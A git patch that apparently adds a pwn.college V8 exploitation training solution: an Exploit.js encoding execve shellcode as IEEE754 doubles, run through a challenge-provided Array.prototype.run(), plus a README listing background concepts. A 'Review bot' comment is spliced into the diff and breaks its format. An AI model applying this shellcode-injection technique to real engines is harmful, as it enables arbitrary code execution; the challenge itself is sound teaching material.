From 409a2d60cd51b531c893a4d9a97c45aceb2505d4 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Sat, 7 Sep 2024 10:12:57 +0800
Subject: [PATCH] Level 1 of PwnCollegeV8Exploitation
---
.../Level1/Exploit.js | 3 +++
.../PwnCollegeV8Exploitation/Level1/README.md | 20 +++++++++++++++++++
2 files changed, 23 insertions(+)
create mode 100644 JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js
create mode 100644 JavaScript/PwnCollegeV8Exploitation/Level1/README.md
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js
new file mode 100644
index 0000000..93254a9
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level1/Exploit.js
@@ -0,0 +1,3 @@
+// Machine code of `execve("/challenge/catflag", NULL, NULL)` in its IEEE754 double representation form
+let shellcode = [-4.658816580787966e+166, -8.593999715215021e+185, 2.820972645905851e-134, 3.0758087950517603e+180, 2.2354425876138794e+40, 3.68572438550025e+180, 1.0803082663212642e+117, -9.2559631348734e+61];
+shellcode.run();
\ No newline at end of file
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level1/README.md b/JavaScript/PwnCollegeV8Exploitation/Level1/README.md
new file mode 100644
index 0000000..a9dc190
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level1/README.md
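Review bot: `shellcode` is never reassigned after the array literal on the second added line of Exploit.js, so `const shellcode = [...]` is the idiomatic declaration rather than `let`. The `\ No newline at end of file` marker shows the file ends without a trailing newline; adding one keeps later diffs of this file clean. The header comment could also record the constraint the README states for this level, e.g. `// Every element must stay a Number so the array keeps the PACKED_DOUBLE_ELEMENTS kind that the challenge's Array.prototype.run() expects`, since the comment currently explains only what the values encode and not why the array's shape matters.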
@@ -0,0 +1,20 @@
+# Level 1
+
+## Problem
+
+Directly execute amd64 machine code by calling `run()` on an array receiver.
+
+The array should have elements kind `PACKED_DOUBLE_ELEMENTS`.
+
+The `run()` is installed on `Array.prototype`.
+
+## Key Knowledge
+
+- [Inheritance and the prototype chain in JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain)
+- `Receiver` Object
+ - [How to understand sender and receiver in Ruby?](https://stackoverflow.com/questions/15592268/how-to-understand-sender-and-receiver-in-ruby)
+ - [Could you explain sender and receiver in OOP and give examples?](https://stackoverflow.com/questions/45474802/could-you-explain-sender-and-receiver-in-oop-and-give-examples)
+- [Elements Kinds in V8](https://v8.dev/blog/elements-kinds)
+- IEEE754 Standard
+ - Conversion between double & int64 representation using IEEE754
+- ShellCode